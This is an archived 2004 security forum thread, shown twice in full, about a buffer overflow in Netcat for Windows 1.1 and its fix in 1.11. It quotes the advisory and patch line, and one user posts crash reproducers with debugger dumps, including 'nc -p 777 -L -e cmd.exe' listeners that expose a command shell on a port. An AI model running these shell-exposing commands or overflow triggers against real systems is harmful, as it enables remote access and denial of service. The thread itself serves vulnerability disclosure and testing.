Netcat V1.11

Help - Search - Member List - Calendar

Full Version: Netcat V1.11

GovernmentSecurity.org > System Security > Windows Systems

101

Dec 28 2004, 10:15 AM

New netcat version due to the large impact of the hole we found Hat-Squad crew

http://www.vulnwatch.org/netcat/

101

Dec 28 2004, 11:38 AM

And thanx to Chris Wysopal, looks like @stake finally react to my calls

QUOTE(Chris Wysopal at vulnwatch)

Application: Netcat for Windows 1.1
Platform: Windows NT/2000/XP/2003
Severity: Remote code execution
Status: Fixed, new version available
Date: 12/27/2004

Summary

Netcat for Windows 1.1 has a buffer overflow vulnerability that allows
remote execution of code. It is exposed when netcat is run using the -e
option which execs a process and pipes the listening socket io to the
stdio of the exec'd process.

Note that this issue does not exist in netcat for the unix platform.

Details

doexec.c (line 445) was missing a check to see if BufferCnt had
incremented past the end of the recieve buffer. With the check in place
the buffer is flushed before it overwrites the end. The following new
line adds the check.

if (RecvBuffer[0] == '\n' || RecvBuffer[0] == '\r' ||
BufferCnt > BUFFER_SIZE-1) {

Update

A fixed version, Netcat for Windows 1.11, is available at:
http://www.vulnwatch.org/netcat/

Credit

Hat Squad discovered this vulnerabiltiy. Hat Squad's advisory is
available at http://www.hat-squad.com/en/000142.html

Bye

Sk4t4r

Dec 28 2004, 12:19 PM

thanks for this version

i test it later

tomas\

Dec 28 2004, 04:51 PM

about time a fixed version came out

realloader

Dec 28 2004, 04:58 PM

Thank you very much Master 101 !

CorryL

Dec 28 2004, 10:34 PM

101 the nc V1.11 is bugged

execute nc -p 777 -L -e cmd.exe

create te file prova.txt and insert

\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90

execute nc 127.0.0.1 777 < prova.txt

Enjoy

0012FC18 00340D98 ASCII "cmd.exe"
0012FC1C 00000000
0012FC20 77F3372D RETURN to ntdll.77F3372D
0012FC24 77E21BFA RETURN to kernel32.77E21BFA from ntdll.ZwWaitForMultipleObjects
0012FC28 00000003
0012FC2C 0012FC6C
0012FC30 00000001
0012FC34 00000000
0012FC38 00000000
0012FC3C 77E2AF20 kernel32.CreateThread
0012FC40 00340C90
0012FC44 00000000
0012FC48 00000024
0012FC4C 00000001
0012FC50 00000000

77F3372D C2 1400 RETN 14
77F33730 90 NOP
77F33731 90 NOP
77F33732 90 NOP
77F33733 90 NOP
77F33734 90 NOP
77F33735 > B8 19010000 MOV EAX,119
77F3373A BA 0003FE7F MOV EDX,7FFE0300
77F3373F FFD2 CALL EDX
77F33741 C2 0C00 RETN 0C
77F33744 90 NOP
77F33745 90 NOP
77F33746 90 NOP
77F33747 90 NOP
77F33748 90 NOP
77F33749 > B8 1A010000 MOV EAX,11A
77F3374E BA 0003FE7F MOV EDX,7FFE0300
77F33753 FFD2 CALL EDX
77F33755 C2 0400 RETN 4
77F33758 90 NOP
77F33759 90 NOP
77F3375A 90 NOP
77F3375B 90 NOP
77F3375C 90 NOP
77F3375D > B8 1B010000 MOV EAX,11B
77F33762 BA 0003FE7F MOV EDX,7FFE0300
77F33767 FFD2 CALL EDX
77F33769 C2 0400 RETN 4
77F3376C 90 NOP
77F3376D 90 NOP
77F3376E 90 NOP
77F3376F 90 NOP
77F33770 90 NOP
77F33771 > B8 1C010000 MOV EAX,11C
77F33776 BA 0003FE7F MOV EDX,7FFE0300
77F3377B FFD2 CALL EDX
77F3377D C2 2400 RETN 24

the nc is blocked

101

Dec 28 2004, 10:41 PM

thanx for notifing it , I have not yet checked the new version , will test it soon and say you my results.

CorryL

Dec 28 2004, 10:53 PM

another bug

nc -l -vv -p 4000

nc 127.0.0.1 4000 < nc.exe

the system is blocked

101

Dec 28 2004, 10:57 PM

QUOTE(CorryL @ Dec 28 2004, 10:53 PM)

another bug

nc -l -vv -p 4000

nc 127.0.0.1 4000 < nc.exe

the system is blocked

yep looks like there is another bug wich freezes netcat, my debugger says nothing , i guess Its not exploitable but Ill msg weld anyway for fixing this , do the same msg him and he will prolly fix that new bug.

passi

Feb 2 2005, 02:36 PM

I need help with netcat's "-o" option (" -o file -> hex dump of traffic"). I want to use this option to see all activities of a netcat connection. My syntax is "nc -e cmd.exe -l -o dump.txt -p 123 -vv".
But it doesn't work, the program generats no "dump.txt". Anyone can help me?

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.


Help - Search - Member List - Calendar Full Version: Netcat V1.11 GovernmentSecurity.org > System Security > Windows Systems 101 Dec 28 2004, 10:15 AM New netcat version due to the large impact of the hole we found Hat-Squad crew http://www.vulnwatch.org/netcat/ 101 Dec 28 2004, 11:38 AM And thanx to Chris Wysopal, looks like @stake finally react to my calls QUOTE(Chris Wysopal at vulnwatch) Application: Netcat for Windows 1.1 Platform: Windows NT/2000/XP/2003 Severity: Remote code execution Status: Fixed, new version available Date: 12/27/2004 Summary Netcat for Windows 1.1 has a buffer overflow vulnerability that allows remote execution of code. It is exposed when netcat is run using the -e option which execs a process and pipes the listening socket io to the stdio of the exec'd process. Note that this issue does not exist in netcat for the unix platform. Details doexec.c (line 445) was missing a check to see if BufferCnt had incremented past the end of the recieve buffer. With the check in place the buffer is flushed before it overwrites the end. The following new line adds the check. if (RecvBuffer[0] == '\n' \|\| RecvBuffer[0] == '\r' \|\| BufferCnt > BUFFER_SIZE-1) { Update A fixed version, Netcat for Windows 1.11, is available at: http://www.vulnwatch.org/netcat/ Credit Hat Squad discovered this vulnerabiltiy. Hat Squad's advisory is available at http://www.hat-squad.com/en/000142.html Bye Sk4t4r Dec 28 2004, 12:19 PM thanks for this version i test it later tomas\ Dec 28 2004, 04:51 PM about time a fixed version came out realloader Dec 28 2004, 04:58 PM Thank you very much Master 101 ! CorryL Dec 28 2004, 10:34 PM 101 the nc V1.11 is bugged execute nc -p 777 -L -e cmd.exe create te file prova.txt and insert \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90 execute nc 127.0.0.1 777 < prova.txt Enjoy 0012FC18 00340D98 ASCII "cmd.exe" 0012FC1C 00000000 0012FC20 77F3372D RETURN to ntdll.77F3372D 0012FC24 77E21BFA RETURN to kernel32.77E21BFA from ntdll.ZwWaitForMultipleObjects 0012FC28 00000003 0012FC2C 0012FC6C 0012FC30 00000001 0012FC34 00000000 0012FC38 00000000 0012FC3C 77E2AF20 kernel32.CreateThread 0012FC40 00340C90 0012FC44 00000000 0012FC48 00000024 0012FC4C 00000001 0012FC50 00000000 77F3372D C2 1400 RETN 14 77F33730 90 NOP 77F33731 90 NOP 77F33732 90 NOP 77F33733 90 NOP 77F33734 90 NOP 77F33735 > B8 19010000 MOV EAX,119 77F3373A BA 0003FE7F MOV EDX,7FFE0300 77F3373F FFD2 CALL EDX 77F33741 C2 0C00 RETN 0C 77F33744 90 NOP 77F33745 90 NOP 77F33746 90 NOP 77F33747 90 NOP 77F33748 90 NOP 77F33749 > B8 1A010000 MOV EAX,11A 77F3374E BA 0003FE7F MOV EDX,7FFE0300 77F33753 FFD2 CALL EDX 77F33755 C2 0400 RETN 4 77F33758 90 NOP 77F33759 90 NOP 77F3375A 90 NOP 77F3375B 90 NOP 77F3375C 90 NOP 77F3375D > B8 1B010000 MOV EAX,11B 77F33762 BA 0003FE7F MOV EDX,7FFE0300 77F33767 FFD2 CALL EDX 77F33769 C2 0400 RETN 4 77F3376C 90 NOP 77F3376D 90 NOP 77F3376E 90 NOP 77F3376F 90 NOP 77F33770 90 NOP 77F33771 > B8 1C010000 MOV EAX,11C 77F33776 BA 0003FE7F MOV EDX,7FFE0300 77F3377B FFD2 CALL EDX 77F3377D C2 2400 RETN 24 the nc is blocked 101 Dec 28 2004, 10:41 PM thanx for notifing it , I have not yet checked the new version , will test it soon and say you my results. CorryL Dec 28 2004, 10:53 PM another bug nc -l -vv -p 4000 nc 127.0.0.1 4000 < nc.exe the system is blocked 101 Dec 28 2004, 10:57 PM QUOTE(CorryL @ Dec 28 2004, 10:53 PM) another bug nc -l -vv -p 4000 nc 127.0.0.1 4000 < nc.exe the system is blocked yep looks like there is another bug wich freezes netcat, my debugger says nothing , i guess Its not exploitable but Ill msg weld anyway for fixing this , do the same msg him and he will prolly fix that new bug. passi Feb 2 2005, 02:36 PM I need help with netcat's "-o" option (" -o file -> hex dump of traffic"). I want to use this option to see all activities of a netcat connection. My syntax is "nc -e cmd.exe -l -o dump.txt -p 123 -vv". But it doesn't work, the program generats no "dump.txt". Anyone can help me? This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.